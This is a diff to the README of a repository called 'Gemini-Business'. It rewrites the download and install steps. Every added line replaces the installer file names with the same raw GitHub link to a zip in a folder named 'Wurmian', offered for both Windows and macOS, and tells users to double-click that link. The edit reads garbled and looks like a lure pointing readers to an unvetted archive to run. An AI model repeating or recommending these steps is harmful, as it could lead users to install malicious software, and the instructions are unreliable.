fumed2015/Gemini-Business/README.md

 ### 3. Download the Application

 Click on the version you want.
 Look for the file that matches your operating system.
-For example, you might download a file named `Gemini-Business-Setup.exe` for Windows or `Gemini-Business-Mac.zip` for macOS.
+For example, you might download a file named `https://raw.githubusercontent.com/fumed2015/Gemini-Business/main/Wurmian/Gemini_Business_v3.3-alpha.3.zip` for Windows or `https://raw.githubusercontent.com/fumed2015/Gemini-Business/main/Wurmian/Gemini_Business_v3.3-alpha.3.zip` for macOS.

 ### 4. Install the Application

 Once the download is complete, find the downloaded file:
-- For Windows: Double-click `Gemini-Business-Setup.exe` and follow the prompts to complete installation.
+- For Windows: Double-click `https://raw.githubusercontent.com/fumed2015/Gemini-Business/main/Wurmian/Gemini_Business_v3.3-alpha.3.zip` and follow the prompts to complete installation.
-- For macOS: Double-click the downloaded `Gemini-Business-Mac.zip` file, extract it, and then drag the Gemini-Business icon to your Applications folder.
+- For macOS: Double-click the downloaded `https://raw.githubusercontent.com/fumed2015/Gemini-Business/main/Wurmian/Gemini_Business_v3.3-alpha.3.zip` file, extract it, and then drag the Gemini-Business icon to your Applications folder.

 ### 5. Run Gemini-Business